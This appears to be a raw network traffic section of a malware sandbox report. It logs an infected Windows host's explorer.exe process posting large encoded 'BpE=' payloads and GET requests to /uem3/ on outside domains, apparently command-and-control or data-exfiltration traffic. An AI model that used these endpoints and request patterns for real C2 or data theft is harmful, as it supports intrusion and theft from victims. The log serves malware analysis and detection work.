74 73 35 4b 39 6f 45 4d 31 5a 71 2d 61 73 53 73 62 38 4d 44 66 6a 6e 54 70 77 78 6d 66 35 41 73 37 51 55 75 76 49 69 2d 4b 72 58 36 56 55 46 56 39 6f 67 5f 30 69 78 63 32 64 69 73 7e 66 47 4e 71 37 6a 55 7e 34 50 6e 4a 61 63 4b 64 43 32 39 6f 37 55 36 6d 70 64 77 33 69 79 50 46 5f 4e 58 43 42 6d 2d 46 63 28 63 7e 4d 46 68 53 6f 44 6c 61 5a 78 6d 51 31 61 34 56 78 48 55 4a 56 45 4c 4a 47 57 32 70 76 70 45 72 74 54 6d 4b 34 5a 52 36 32 7e 34 33 2d 31 62 74 61 55 66 58 46 56 33 64 4c 66 47 52 77 72 53 6c 4e 30 50 73 68 68 51 56 58 75 58 43 41 34 75 6d 61 42 5f 6e 65 4b 5a 74 6a 65 70 38 45 7e 30 55 44 71 50 77 36 56 4a 5a 68 45 44 37 45 43 62 30 61 6b 31 54 4b 7a 4b 32 36 49 5f 6c 61 4d 76 58 48 61 30 50 65 6f 77 43 70 31 35 55 4d 61 30 51 68 62 41 36 5f 65 41 7a 63 30 59 39 34 6e 6b 7e 42 74 5f 39 46 4e 6b 37 72 38 74 56 57 68 72 34 57 74 6c 50 4f 76 49 50 58 54 5f 65 67 42 4d 33 5a 72 65 77 39 54 54 39 74 4b 42 71 55 38 32 37 57 65 2d 78 79 73 54 4c 32 41 4a 6c 46 34 54 51 6a 36 49 4f 4f 36 36 37 78 7a 30 65 53 6f 55 78 4a 57 4a 35 51 76 32 4e 4a 53 4e 53 7a 53 50 51 46 36 58 77 50 6b 2d 75 39 49 4b 49 35 30 77 53 41 78 51 78 4d 49 51 53 37 59 4b 44 6b 4b 6e 33 55 4a 7a 4c 5a 46 68 49 2d 4e 58 6a 77 77 6e 79 4a 37 39 4f 37 4a 57 4c 6e 4c 6b 4e 46 61 37 75 53 6f 59 6f 4f 32 7a 57 42 38 31 38 34 39 55 74 43 4d 6f 7a 33 73 39 59 6c 28 46 4f 55 50 73 57 44 36 46 79 75 45 53 78 37 54 61 6d 4f 6e 75 36 68 36 56 53 51 69 63 56 37 33 68 38 6b 73 75 28 41 6b 2d 75 30 73 4f 70 74 75 73 48 2d 49 75 53 63 5a 51 62 46 50 32 59 62 52 4c 65 5f 51 2d 38 45 33 57 28 46 35 6a 44 46 45 32 6c 4e 78 6f 74 4f 45 75 47 57 34 63 28 61 6f Data Ascii: BpE=uyJKDBIrRuMwvB1ItTvhPLfTeJV2ECPDK61yYTwaAAVzOrST4NbJWsdU9n06PtrUURnWDIv1ZXtK7-Oq62~d4KHxhhn5igCvUNr2CQmF1-5Q5bg2padF4N1dQ6wGVoEEqdvb5PV0VLazkicdTQKTfraB768sBYioM300Imp9DRThBpprNi5Au3EFu4O19lzYyuN1GmYRMbXP8H9FKz1IcxeNANP4KoLRbewC1nAmJdKBls0TYFZwSm9_0-yweU5axrytmmohRzZPlDZgpG60pcTyt4g3yWhHktA4JHOk7XFyNarNk_IEevqtzjqcdL1AoGUPIIX_OY2xXIacxr5V7sbpCXpIFK7S4u(07sOc9cjXnG(gao0reavqJfEtJSTBCzJjNYvH0Rhw002h5PAwdTt6QyyG6gGzocg5ynoLzVVu5Erv3ZRhPsAeOhHcGS9Efj2rZLmefU9XIX0EUJQv(JdgYZlhtutJeCei7QbcIvabydkZFGt5qYLtzmQM5esE8jSADdG2IydD61Nqnt5lYGzz9izrCOLIyoPBhIHUMmzVpmOcCuq95NxrFIsmLVp5r9mGBLNhlor0vZEE(F3my7o2W8cnaLO2~_9TvR0kKAw_DcmNgGkFhBjGlyAdtTAyKlAlVcX-2J07QsyHmvy0sHVQq-kZMb9pRZ32AS374BBIwFIYVoS_FmUdojdLvl2lQXTqpxPxrcKbXYZyVFG6SFgWuJf5VTwPoEx-CCZEmtEsaEwWAT6xm88k1JTR19Z6Bq3OoM8aE5Z5(E~GGS3Xql3mRcZS2o(_7E9M4KwGRGWAts5K9oEM1Zq-asSsb8MDfjnTpwxmf5As7QUuvIi-KrX6VUFV9og_0ixc2dis~fGNq7jU~4PnJacKdC29o7U6mpdw3iyPF_NXCBm-Fc(c~MFhSoDlaZxmQ1a4VxHUJVELJGW2pvpErtTmK4ZR62~43-1btaUfXFV3dLfGRwrSlN0PshhQVXuXCA4umaB_neKZtjep8E~0UDqPw6VJZhED7ECb0ak1TKzK26I_laMvXHa0PeowCp15UMa0QhbA6_eAzc0Y94nk~Bt_9FNk7r8tVWhr4WtlPOvIPXT_egBM3Zrew9TT9tKBqU827We-xysTL2AJlF4TQj6IOO667xz0eSoUxJWJ5Qv2NJSNSzSPQF6XwPk-u9IKI50wSAxQxMIQS7YKDkKn3UJzLZFhI-NXjwwnyJ79O7JWLnLkNFa7uSoYoO2zWB81849UtCMoz3s9Yl(FOUPsWD6FyuESx7TamOnu6h6VSQicV73h8ksu(Ak-u0sOptusH-IuScZQbFP2YbRLe_Q-8E3W(F5jDFE2lNxotOEuGW4c(aoFLfg2jzDPlMagI3ncwkQZoePPG2DHm7Eok9dLWUUW4DgOwlfDLc25gqu5Vy0ukua8oucvyPBMYxYuFpnuazPxxCK9TD4_P9t593EdoZC0PWqO7upWj6uYNpVCWS1h53rWm052fUEXo9HGm_UobHzhBmZjjKXqIYWPN6UZUvXhjLBjx0Hv0hNvXLXio2cybyTuuFivzk7znHsgZHFAhRhZbOsBJGrA(pp367RviQ2l8574DZkTZRgOPUTcIu4BlpZ4C2gTaISSjH1Nzkepl8z3fPiulS9RYVnZ~VkB7YEjJoCrYswVMr1Bt5OLA6mT78Z2cf5wP43r245fv6DlWAMJ(mqEmFWr7IRwtvWCnseNu1sPEhp_OVE0Yg7fki2yGfg0gZBLHWuduYUlncLUggFfDefYodubVQrkjErojQTpRbZaxrwI2ZNeE0QP(Bwl1-EMgnDoELwQO64ECtzHsXECO6FSLs8Qu_RScWYNzxqiA0NypKvgeIBUblaYJqcgMJss2kyMgXfHilMWNvVvhPuw7jvBO0HIHjUZ2qbrqUhzHCnjjNNy9112wTG7HdHUPR8mzOt-RGZ8(4u8gH47GjSFWCcCcWMStFzJMtwPY_kliWQ91NkqVJMM1EfPTWgJY5hMopwhpDUPCrC5Hxeerl6ZJnLLbyAA88WJGW0nMyrXbQa3drv0Jyh_ET5Ya-svZ88cqy(DxvvkoznOCQkMQE(Ip_cQzKG1XEoeYdlxOieRXW8ptxsd3-wJcyHi5ubOKdNKi42tPcZ5rm068FDIqrRMJAyBm5elNSyRb0EP7nsOIsvtpirVucJ8zBXjAdc9s6gZHluI433T0CvFUtZnrd2KRPrC83WO3m4s49xBXAKHlyYZP-OSFlmjLIkynJCIvRtXCZo4YqcH50gnVQ4YaRHY7OMKGcYBW0U_Dpyvj6g1DNRcywVaS1m6B3TkllSHwtLTL5wtpfdQWOW0vY7WqsTYCG(AABtbrf2_K7cjOSA4xxBO(KYeWrQq2gMUiqtI7OiDJd2UTPFP3EnodNRA7vVVqsIO4RMhyVdZNBGLm2wYrO1VHi4ikSp0aElUmmVpg53gPJKZdqAMzqbEs4zLE4s6ywHVcUDU1MDCd1uoolim9MR2Tw3WRJmKUxDurBmAFflcbBZvc0GOTs2Gk4De163n8K1QAM5-C94G2fOj2e7F4aDPsS0yVrrV6E(2EHmGfefd~IYanREWWxmgJHVuPiGLRG(imS4YPKRki6~dWluG(cKWOTKJihYgteqQqd0oIHKCIQXpKRpv~fKW3zMyb8SUbx3tNAMtUqDe1OQQsUofb1iO9huELyEynOQ33yfKw99kuJccEmPJz6G3XnnYxfynqQfYIDIHSPF475N7gL6iVB0Hj2lDRTbYiUElzPetEhTSm8rTolFMWTfYsyzZ7eJXwtvs3sGe3VyW(iK4oBYsR4lXrMlrpfwN00XrITI2jfACmgibMdD-HDIdIlSSWbrey6Q1iIgCbPq2YLBVygDTHE0m2-5J7BTkOYTYglXXmljxvzwznDj24w6BpPFVe5mjFcoPO1nj0bE-57H4NYmc2C56xnQJ1DuqI_bPud5xFkdWh1ZRgP5ZY-4Rn3ljlpF_hP0BvVMgi6piNZZAnzgxgSPa~kg1pvJiD3YCMStIDtcJ3sS90OH27vfIzmLabYTKJLlsFkyl470ndK~CBbwUFRA4ks7WWBpp2V7yRrEjCAFpXE(Db59cphsbGu4CdPbVHe6XRHpmbUe6lsbMW6A_V-xX93CG6fENMFIa(rOeIe~TmVhTP7dpzOyPU1qARaYwDWeOpBa08QJEI2OzS7pNFif-L9UoEaCVYhoNQht_pFRcv8XrddhRt0e3a9TTKHxWhwjlA_~_X5Szl9HhYa1mVv7Zu6QAbrbWBj~dJ9wqQpRSFwgo8me765iyC-76yzR709EENIkJgLZHwD(HnhCtUBdc2Xz94oAnL75YmppCSxM6xHMv~49uzpXI5HWIYXL7Nb4FF-kW6Wv8OAle2A(NlY9YtcZQBJSaqnT5Hz41CU(gGKtmMToY7vZLffUkogAX6PxCDFx8E5EIOnHkFF7IqOmPyEIIb4EX0i7PIkmojbTsO8zDyrq917L-zygaxU533ylqy5ovjNPE6EmWfsw0vjmNyzUx3I9W2UiPAUWCSJ~eu5ZAs5wQwlsH68ehO3MgZ0AuKEiEk9ZkA7ptkWVa~1HdcW~MHsSmQutPRK9zIuzn3ZPg8ierLUsKp6(QldfCmjkNbq(CLi2hglTrgpRB~6byAx9xXILVwvjYBzxm9hbKxwEttWbVZNfTgBUt0Eox~Z5Fk3(lXjI1(LdLdpC0hSE9mNkFxd7RCN5NgUU_QBXd(R3BPB(9ubedy8Q4~6WjnPglXIYvOX2VbaKrIojQIWCd7W7ZFYn5FqjkCiI5pfm_9B25cw1Bx6iA85soOnXWQAy7(6dqpwJHYb0cP9mUS3BI(2iVyqFoSV0nxbz4PXtSuxx-McVMLPuMT3x2L9vkVHPgbEgu9BUbvEkohf3f81~qGcJjhueWVzafwJsS8rh4(hE6tsETpQZDbslk~_RnaIXnChJyW7ygqJzo9GbF6C5wGVhINOacB0lScThK39M4ZaZm3Y1dB8MPax~vEe(kzFTyUcvjtqy-DZQ3JCZ1gWYlEZLvgV5zwdl8bO6nlSyaz-VQVgsAgIjWshaJ4C4EpH~Xnj9nMTx9r8
Jun 21, 2022 21:09:03.661240101 CEST	11006	OUT	Data Raw: 4e 2d 34 6e 33 44 7e 62 28 46 4b 35 71 31 4b 33 77 75 47 69 76 76 34 44 70 56 66 6a 4b 30 67 4b 6a 58 59 76 6f 36 6e 6c 41 59 30 31 35 4a 64 44 51 49 66 73 63 6b 57 35 35 6c 70 30 4c 49 78 75 42 6f 32 67 6c 4e 6c 4d 39 6a 71 2d 78 43 70 68 41 70 Data Ascii: N-4n3D~b(FK5q1K3wuGivv4DpVfjK0gKjXYvo6nlAY015JdDQIfsckW55lp0LIxuBo2glNlM9jq-xCphApIP892ppsSxoqbidzbRazecFrjCyW(K2or8XCOGIrtt16ET~u~p7bHX9gDTP0fHK5RoGpVx285TOGXZ1WMtFwiW1KSu4qNN56i68YnUVtorDjQDxIJJc9tCJHWRAYx1tuyTZaLIVJf4CFcfoOGErEeVn8ESMuuuZ72
Jun 21, 2022 21:09:03.661293030 CEST	11019	OUT	Data Raw: 64 4a 42 37 52 50 51 30 31 69 77 6f 79 54 69 54 58 51 33 38 59 37 76 5a 69 6b 52 78 34 32 68 77 36 6a 42 2d 39 5a 43 42 74 30 66 63 61 6c 79 50 6c 67 74 46 77 78 6f 75 45 64 69 31 28 49 5a 2d 33 5f 57 41 4c 45 51 77 78 63 75 43 49 6a 76 61 7e 43 Data Ascii: dJB7RPQ01iwoyTiTXQ38Y7vZikRx42hw6jB-9ZCBt0fcalyPlgtFwxouEdi1(IZ-3_WALEQwxcuCIjva~CvsmNcF9l9r3ZK3HFSUrDVmdR3So0(Bxzm6yFl4XMAz2ZBMSGQG43mLIUfruiNphbv-M2Q1sBpJWCTeTggD~n950g8iJLF0GR7QLRRoenBP2zW9q9PQ6G4nDUiWI7pBvxKiVLyh83DPsI8YihgiDlLiVXdo3fSNsn9
Jun 21, 2022 21:09:03.661317110 CEST	11026	OUT	Data Raw: 4e 76 44 58 36 62 6a 4a 42 5a 37 7a 43 58 69 67 7a 57 75 54 59 37 32 4a 4d 4e 32 47 71 43 44 57 78 53 6e 39 7e 4d 50 66 61 53 76 46 47 4a 4a 75 71 65 65 73 4b 7a 54 4a 68 70 66 76 51 4a 6e 36 6c 6d 38 58 36 44 4d 54 62 6b 4c 33 4b 57 62 56 61 5f Data Ascii: NvDX6bjJBZ7zCXigzWuTY72JMN2GqCDWxSn9~MPfaSvFGJJuqeesKzTJhpfvQJn6lm8X6DMTbkL3KWbVa_AqaG0QN13CNBdmrJew3Bq0VAfL(jzXIE564sq8lVZGEJg-YdkjJhNnziROS7uP(_yEtchB9WKpJ3ExDZv3bof46-wdi0aaCGW1qxRKBqHZgXHAGXhrNAt8nvjZN9l1OjlewET57o7nrS9MHQ8Dub4xUqxivqHRCKY
Jun 21, 2022 21:09:03.668092012 CEST	11028	IN	HTTP/1.1 409 Conflict Date: Tue, 21 Jun 2022 19:09:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5565 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 71ef0951c99e9079-FRA Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 44 4e 53 20 72 65 73 6f 6c 75 74 69 6f 6e 20 65 72 72 6f 72 20 7c 20 77 77 77 2e 61 73 74 72 6f 66 72 61 6e 63 65 2e 6f 6e 6c 69 6e 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 0a 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 26 26 77 69 6e 64 6f 77 2e 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 26 26 4a 53 4f 4e 26 26 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 65 72 72 6f 72 2d 66 65 65 64 62 61 63 6b 2d 73 75 72 76 65 79 22 29 2c 64 3d 64 6f 63 75 6d 65 Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>DNS resolution error \| www.astrofrance.online \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" /><script>(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&JSON.stringify){var e=function(a){var c=document.getElementById("error-feedback-survey"),d=docume
Jun 21, 2022 21:09:03.668119907 CEST	11030	IN	Data Raw: 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 65 72 72 6f 72 2d 66 65 65 64 62 61 63 6b 2d 73 75 63 63 65 73 73 22 29 2c 62 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 61 3d 7b 65 76 65 6e 74 3a 22 66 65 65 64 62 61 63 Data Ascii: nt.getElementById("error-feedback-success"),b=new XMLHttpRequest;a={event:"feedback clicked",properties:{errorCode:1001,helpful:a,version:1}};b.open("POST","https://sparrow.cloudflare.com/api/v1/event");b.setRequestHeader("Content-Type","appli
Jun 21, 2022 21:09:03.668137074 CEST	11031	IN	Data Raw: 3d 22 65 72 72 6f 72 22 3e 45 72 72 6f 72 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 31 30 30 31 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 Data Ascii: ="error">Error</span> <span>1001</span> </h1> <span class="inline-block md:block heading-ray-id font-mono text-15 lg:text-sm lg:leading-relaxed">Ray ID: 71ef0951c99e9079 •</span> <span class="inline-b
Jun 21, 2022 21:09:03.668149948 CEST	11032	IN	Data Raw: 20 77 65 62 73 69 74 65 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 62 65 20 64 69 73 74 72 69 62 75 74 65 64 20 74 6f 20 6f 75 72 20 67 6c 6f 62 61 6c 20 6e 65 74 77 6f 72 6b 2e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: website's information to be distributed to our global network.</li> <li><strong>Less likely:</strong> something is wrong with this site's configuration. Usually this happens when accounts have been signed up with a partner orga
Jun 21, 2022 21:09:03.668160915 CEST	11033	IN	Data Raw: 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d Data Ascii: an class="cf-footer-separator sm:hidden">•</span> <span class="cf-footer-item sm:block sm:mb-1"><span>Your IP</span>: 102.129.143.53</span> <span class="cf-footer-separator sm:hidden">•</span> <span class="cf-footer-item

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49862	188.114.96.6	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:09:03.661695957 CEST	11027	OUT	GET /uem3/?BpE=hw9wdlgRPJgu6mhEw3v3abu2JdZhLnzfTKsoEzFZGCpKAu6wx+OREaAyoHMqAY/6AEPW&SH=IDKTKDM HTTP/1.1 Host: www.astrofrance.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 21, 2022 21:09:03.683218956 CEST	11034	IN	HTTP/1.1 409 Conflict Date: Tue, 21 Jun 2022 19:09:03 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 71ef0951e8ba91d5-FRA Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31 Data Ascii: error code: 1001

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49863	213.186.33.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:09:08.793270111 CEST	11035	OUT	POST /uem3/ HTTP/1.1 Host: www.domainedelapoujade.info Connection: close Content-Length: 713 Cache-Control: no-cache Origin: http://www.domainedelapoujade.info User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.domainedelapoujade.info/uem3/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 42 70 45 3d 61 30 6e 35 49 5f 7e 41 6f 66 55 52 4d 6c 51 4e 6b 6a 73 65 43 6c 42 5a 74 49 5a 58 58 6b 59 65 6e 30 6e 4d 41 4b 38 71 42 6c 71 48 52 78 63 71 56 6e 4c 33 39 78 61 4a 31 7a 64 66 79 7a 77 71 75 6d 31 77 59 37 30 52 53 64 44 38 72 64 75 44 76 53 32 6b 45 30 7e 73 66 78 46 63 32 42 38 70 44 66 6e 6f 59 37 4b 68 44 41 59 66 44 31 5a 48 4a 68 47 54 6b 73 35 74 6d 32 48 5f 71 7a 71 72 6c 55 47 58 68 7a 57 43 42 62 79 58 75 54 52 58 57 64 4a 53 4d 6c 44 4a 75 71 49 30 39 70 7e 6e 52 39 43 33 74 5f 38 4f 41 44 6f 4f 4e 63 4f 2d 61 5f 30 41 77 46 78 35 63 50 4b 57 4b 38 76 48 68 68 65 58 62 76 61 78 56 58 63 6e 70 55 28 55 4a 44 78 33 6b 30 67 75 7a 61 34 74 59 63 63 77 74 46 46 44 59 47 6a 58 58 72 5a 66 79 57 73 45 49 51 7a 6e 68 36 73 6c 5a 69 65 42 54 6c 6a 78 66 4e 56 41 53 31 37 75 35 46 79 41 39 73 4c 64 71 73 4d 36 76 6a 56 59 4c 6b 6c 48 70 72 48 50 50 56 63 35 53 4d 39 78 42 6f 32 68 46 4e 47 58 73 55 62 71 5a 76 6f 52 68 69 7a 6d 4c 6a 64 39 48 43 33 4f 42 37 74 36 50 61 38 35 6e 52 4a 2d 35 76 47 42 77 4c 7a 70 74 64 7a 6e 4d 31 28 64 4e 76 33 57 77 54 69 2d 57 57 76 41 34 54 6c 43 4f 6d 61 75 6f 4b 62 30 62 47 31 44 54 41 47 64 7e 56 32 39 35 6d 78 4e 54 75 49 36 51 31 6d 36 54 70 66 2d 38 61 50 63 39 61 52 66 6e 35 4c 38 79 76 78 6b 32 55 33 50 6c 6f 37 4b 56 30 43 72 32 2d 7e 66 6e 42 42 72 35 4e 6b 66 37 52 76 50 6b 5f 48 30 34 74 72 59 42 31 7a 6f 50 61 63 35 52 63 77 5a 7e 44 36 64 4d 42 32 79 57 50 62 57 53 32 44 76 78 51 63 68 74 37 57 74 78 36 32 56 66 6e 6e 64 6d 32 41 47 62 49 4f 4e 57 5f 59 57 39 43 62 4f 51 71 4c 36 56 73 6b 74 45 2d 6a 53 56 72 41 77 73 61 30 39 6e 4f 75 75 5a 68 43 6d 46 6d 6c 77 61 53 61 31 54 45 68 68 67 53 72 76 76 78 5a 7a 75 5f 7e 46 76 35 54 4e 33 49 79 6e 64 72 54 35 68 63 39 67 69 64 30 79 75 4c 36 4d 39 73 71 4d 59 70 61 77 62 56 4a 78 67 50 49 37 59 75 64 76 36 43 54 34 51 6a 48 39 39 50 63 55 6c 6f 7e 70 58 66 33 4f 30 6c 67 64 45 36 42 61 76 61 36 34 32 4d 54 70 48 78 58 62 4d 7a 38 78 53 59 66 65 42 54 37 36 7a 6b 39 34 79 6c 38 39 49 45 68 63 68 4e 51 6b 72 39 4e 33 63 68 35 43 59 54 4b 35 6a 44 49 2d 69 2d 66 5f 30 55 41 4e 61 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BpE=a0n5I_~AofURMlQNkjseClBZtIZXXkYen0nMAK8qBlqHRxcqVnL39xaJ1zdfyzwqum1wY70RSdD8rduDvS2kE0~sfxFc2B8pDfnoY7KhDAYfD1ZHJhGTks5tm2H_qzqrlUGXhzWCBbyXuTRXWdJSMlDJuqI09p~nR9C3t_8OADoONcO-a_0AwFx5cPKWK8vHhheXbvaxVXcnpU(UJDx3k0guza4tYccwtFFDYGjXXrZfyWsEIQznh6slZieBTljxfNVAS17u5FyA9sLdqsM6vjVYLklHprHPPVc5SM9xBo2hFNGXsUbqZvoRhizmLjd9HC3OB7t6Pa85nRJ-5vGBwLzptdznM1(dNv3WwTi-WWvA4TlCOmauoKb0bG1DTAGd~V295mxNTuI6Q1m6Tpf-8aPc9aRfn5L8yvxk2U3Plo7KV0Cr2-~fnBBr5Nkf7RvPk_H04trYB1zoPac5RcwZ~D6dMB2yWPbWS2DvxQcht7Wtx62Vfnndm2AGbIONW_YW9CbOQqL6VsktE-jSVrAwsa09nOuuZhCmFmlwaSa1TEhhgSrvvxZzu_~Fv5TN3IyndrT5hc9gid0yuL6M9sqMYpawbVJxgPI7Yudv6CT4QjH99PcUlo~pXf3O0lgdE6Bava642MTpHxXbMz8xSYfeBT76zk94yl89IEhchNQkr9N3ch5CYTK5jDI-i-f_0UANaw).
Jun 21, 2022 21:09:08.822644949 CEST	11036	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 21 Jun 2022 19:09:09 GMT content-type: text/html content-length: 138 location: http://www.domainedelapoujade.info x-iplb-request-id: 66818F35:C2C7_D5BA2105:0050_62B21754_BC3FC84:98B9 x-iplb-instance: 16976 set-cookie: SERVERID77446=200176\|YrIXV\|YrIXV; path=/; HttpOnly connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49864	213.186.33.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:09:08.825153112 CEST	11050	OUT	POST /uem3/ HTTP/1.1 Host: www.domainedelapoujade.info Connection: close Content-Length: 36477 Cache-Control: no-cache Origin: http://www.domainedelapoujade.info User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.domainedelapoujade.info/uem3/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 42 70 45 3d 61 30 6e 35 49 39 72 5a 6e 50 49 36 49 31 73 2d 6b 57 68 4a 4b 32 5a 62 76 5a 4a 49 62 46 45 37 67 46 33 69 45 4f 34 39 43 6c 43 64 56 41 78 36 45 55 37 5a 39 7a 54 66 38 67 35 62 31 54 39 59 75 6d 64 4f 59 37 77 52 54 65 44 73 72 2d 6d 6c 75 30 61 